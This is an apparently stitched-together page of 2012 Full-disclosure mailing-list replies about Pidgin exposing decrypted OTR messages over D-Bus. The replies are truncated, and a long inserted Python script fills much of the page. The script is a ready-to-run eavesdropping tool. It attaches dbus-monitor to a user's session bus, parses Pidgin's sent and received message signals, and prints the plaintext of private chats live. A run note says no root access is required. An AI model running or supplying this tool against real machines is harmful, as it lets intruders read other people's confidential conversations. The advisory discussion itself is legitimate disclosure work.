Re: [Full-disclosure] pidgin OTR information leakage

2012-02-27 Thread Michele Orru
Jann Horn wrote: > 2012/2/25 Dimitris Glynos : >> Pidgin transmits OTR (off-the-record) conversations over DBUS in >> plaintext. This makes it possible for attackers that have gained >> user-level access on a host, to listen in on private conversat
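The leak described in the advisory can be observed with nothing more than dbus-monitor: libpurple emits the decrypted text of every IM it sends or receives as a signal on the user's D-Bus session bus, so any process that can connect to that bus sees it. The script below is an added example for this thread, not code from the advisory, from Pidgin or from any poster. It assumes libpurple's D-Bus interface im.pidgin.purple.PurpleInterface emits ReceivedImMsg and SentImMsg with the arguments (account, sender-or-recipient, message, conversation, flags); the dbus-monitor text layout the parser expects is reconstructed from memory, and the sample transcript is constructed for the example.

```python
"""Read Pidgin IM text off the D-Bus session bus via dbus-monitor.

Added example for the Full-disclosure "pidgin OTR information leakage"
thread; not Pidgin code. Assumptions: libpurple's interface
im.pidgin.purple.PurpleInterface emits ReceivedImMsg/SentImMsg signals
with arguments (int32 account, string peer, string message,
int32 conversation, uint32 flags); dbus-monitor's text format is as
modelled in SAMPLE below, which is constructed, not captured.
"""
import re
import subprocess
from dataclasses import dataclass

PURPLE_IFACE = "im.pidgin.purple.PurpleInterface"
MEMBERS = ("ReceivedImMsg", "SentImMsg")   # assumed libpurple signal names


@dataclass
class ImMessage:
    member: str        # "ReceivedImMsg" or "SentImMsg"
    account: int       # libpurple account object id
    peer: str          # sender for received messages, recipient for sent ones
    text: str          # plaintext (post-OTR-decryption) message body
    conversation: int  # libpurple conversation object id
    flags: int


def match_rules():
    """D-Bus match rules restricting dbus-monitor to the two IM signals."""
    return [f"type='signal',interface='{PURPLE_IFACE}',member='{m}'" for m in MEMBERS]


def monitor_command():
    """Command line for a same-user eavesdropper on the session bus."""
    return ["dbus-monitor", "--session", *match_rules()]


# Header of one signal in dbus-monitor output; we only care about interface/member.
_HEADER = re.compile(r"^signal .*interface=(?P<iface>[\w.]+); member=(?P<member>\w+)\s*$")
# One indented argument line, e.g. '   string "hello"' or '   int32 1'.
_ARG = re.compile(r"^\s+(?P<type>int32|uint32|string)\s+(?P<val>.*)$")


def _finish(member, args):
    """Build an ImMessage once all five arguments of a matching signal are in."""
    if member is None or len(args) != 5:
        return None
    account, peer, text, conv, flags = args
    return ImMessage(member, int(account), peer, text, int(conv), int(flags))


def parse_lines(lines):
    """Yield ImMessage objects from an iterable of dbus-monitor output lines.

    Any non-indented line starts a new bus message; only signal headers for
    the purple IM members are collected, everything else is skipped.
    """
    member, args = None, []
    for line in lines:
        line = line.rstrip("\n")
        if line and not line[0].isspace():          # new message header
            msg = _finish(member, args)
            if msg:
                yield msg
            member, args = None, []
            head = _HEADER.match(line)
            if head and head["iface"] == PURPLE_IFACE and head["member"] in MEMBERS:
                member = head["member"]
            continue
        if member is None:
            continue                                 # argument of an uninteresting message
        arg = _ARG.match(line)
        if arg:
            val = arg["val"]
            if arg["type"] == "string":
                val = val[1:-1]                      # drop the quotes dbus-monitor prints
            args.append(val)
    msg = _finish(member, args)
    if msg:
        yield msg


def parse_dbus_monitor(text):
    """Parse a complete dbus-monitor transcript into a list of ImMessage."""
    return list(parse_lines(text.splitlines()))


# Constructed sample transcript: one received IM, an unrelated method call, one sent IM.
SAMPLE = """\
signal time=1330371000.123456 sender=:1.42 -> destination=(null destination) serial=77 path=/im/pidgin/purple/PurpleObject; interface=im.pidgin.purple.PurpleInterface; member=ReceivedImMsg
   int32 1
   string "alice@example.org/home"
   string "the OTR session is up, here is the passphrase we talked about"
   int32 3
   uint32 0
method call time=1330371001.000000 sender=:1.42 -> destination=org.freedesktop.DBus serial=78 path=/org/freedesktop/DBus; interface=org.freedesktop.DBus; member=GetNameOwner
   string "org.freedesktop.Notifications"
signal time=1330371002.500000 sender=:1.42 -> destination=(null destination) serial=79 path=/im/pidgin/purple/PurpleObject; interface=im.pidgin.purple.PurpleInterface; member=SentImMsg
   int32 1
   string "alice@example.org"
   string "got it, deleting now"
   int32 3
   uint32 0
"""


def live_monitor():
    """Attach to the running user's session bus and print IM text as it passes."""
    proc = subprocess.Popen(monitor_command(), stdout=subprocess.PIPE, text=True)
    for msg in parse_lines(proc.stdout):
        direction = "<-" if msg.member == "ReceivedImMsg" else "->"
        print(f"{direction} {msg.peer}: {msg.text}")


if __name__ == "__main__":
    for m in parse_dbus_monitor(SAMPLE):
        print(m.member, m.peer, repr(m.text))
    live_monitor()
```

Run as the same Unix user as the Pidgin process (or with that user's DBUS_SESSION_BUS_ADDRESS); no root and no access to Pidgin's memory or files is needed, which is the point the advisory makes. The generator only emits a message once the next bus message header arrives, so in live mode the last IM shows up when the following one does or when dbus-monitor exits.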

Re: [Full-disclosure] pidgin OTR information leakage

2012-02-27 Thread Rich Pieri
On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: > I think you didn't understand the content of the advisory. > If there are 10 non-root users in an Ubuntu machine for example, > if user 1 is using pidgin with OTR compiled with DBUS, then users 2 to 10 > can see what user 1 pidgin conversation. Th

Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Jeffrey Walton
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri wrote: > On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: >> I think you didn't understand the content of the advisory. >> If there are 10 non-root users in an Ubuntu machine for example, >> if user 1 is using pidgin with OTR compiled with DBUS, then use

Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Dimitris Glynos
On 02/27/2012 11:23 PM, devn...@vonage.com wrote: > > I believe that clarification is in order. Indeed it is. The original post mentions a same-user attack vector which is very misleading as to what the real problem here is. And it boils down to this: Once a process sends private info over DBUS

Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Dimitris Glynos
On 02/28/2012 12:14 AM, Dimitris Glynos wrote: > On 02/27/2012 11:23 PM, devn...@vonage.com wrote: >> >> I believe that clarification is in order. > > Indeed it is. The original post mentions a same-user attack > vector which is very misleading as to what the real problem here is. > > And it boil